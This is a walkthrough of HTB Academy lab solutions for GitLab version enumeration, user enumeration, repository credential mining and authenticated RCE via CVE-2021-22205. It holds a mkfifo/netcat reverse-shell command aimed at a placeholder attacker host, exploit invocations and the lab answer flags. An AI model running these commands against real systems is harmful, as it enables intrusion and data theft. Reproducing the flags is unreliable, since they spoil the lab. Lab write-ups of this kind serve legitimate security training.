GitLab Discovery & Enumeration
π― Objective: Discover GitLab instances, enumerate version information, and extract sensitive data from repositories including credentials and configuration files.
Overview
GitLab is a web-based Git repository hosting tool with wiki, issue tracking, and CI/CD capabilities. Often contains sensitive data, hardcoded credentials, SSH keys, and configuration files in public/internal repositories.
HTB Academy Lab Solutions
Lab 1: Version Enumeration
Question: "Enumerate the GitLab instance at http://gitlab.inlanefreight.local. What is the version number?"
Target: gitlab.inlanefreight.local (add to /etc/hosts)
Setup & Access
# Add vHost to hosts file
echo "10.129.201.88 gitlab.inlanefreight.local" >> /etc/hosts
# Access GitLab instance
# URL: http://gitlab.inlanefreight.localVersion Discovery Methods
Register account (if allowed) β
/helppage shows versionPublic projects exploration β
/explorefor accessible reposLow-risk version detection techniques
Answer: 13.10.2
Lab 2: Credential Discovery
Question: "Find the PostgreSQL database password in the example project."
Repository Investigation
Browse public projects via
/exploreCheck "Inlanefreight dev" project
Search through files for configuration data
Look for database configs - config files, environment variables
Check commit history for accidentally committed credentials
Found in: Configuration file or environment setup
Answer: postgres
Discovery Techniques
1. GitLab Detection
# Standard GitLab indicators
- /users/sign_in (login page with GitLab logo)
- /explore (public projects page)
- /help (version info - requires auth)2. User Enumeration
# Username enumeration via registration
# Try common usernames: admin, root, administrator
# Error: "Username is already taken" = valid user3. Repository Mining
Public repos via
/exploreSearch functionality for keywords
File exploration for sensitive data
Commit history review
Common Findings
Sensitive Data Sources:
π Configuration files (database.yml, config.php)
π Environment variables (.env files)
ποΈ SSH private keys
π§ API keys and tokens
π Hardcoded passwords
Attack Vectors:
Account registration β internal repo access
Credential reuse from found passwords
SSH key usage for system access
API abuse with extracted tokens
HTB Academy Attacking Labs
Lab 3: User Enumeration
Question: "Find another valid user on the target GitLab instance."
Method: Automated User Enumeration
# Download GitLab user enumeration script
searchsploit -m ruby/webapps/49821.sh
# Run user enumeration
./49821.sh --url http://gitlab.inlanefreight.local:8081 --userlist /opt/useful/SecLists/Usernames/cirt-default-usernames.txt | grep exists
# Result: [+] The username DEMO exists!Answer: DEMO
Lab 4: Authenticated RCE
Question: "Gain remote code execution on the GitLab instance. Submit the flag in the directory you land in."
Method: CVE-2021-22205 (ExifTool RCE)
# Download RCE exploit
searchsploit -m ruby/webapps/49951.py
# Start listener
nc -nvlp 9001
# Execute RCE (requires valid account: HTBAcademy:password123)
python3 49951.py -t http://gitlab.inlanefreight.local:8081 -u HTBAcademy -p password123 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc PWNIP PWNPO >/tmp/f'
# In reverse shell:
cat flag_gitlab.txtAnswer: s3cure_y0ur_Rep0s!
Attack Summary
Vulnerabilities:
User Enumeration - Registration page validation
CVE-2021-22205 - Authenticated RCE via ExifTool metadata
Self-Registration - Often enabled for easier access
Attack Chain:
User enumeration β Find valid accounts
Account creation β Register if allowed
Repository mining β Extract credentials/data
RCE exploitation β Authenticated command execution
π‘ Pro Tip: Always check both public repos and try to register for internal access - many GitLab instances allow open registration revealing additional sensitive repositories.
Last updated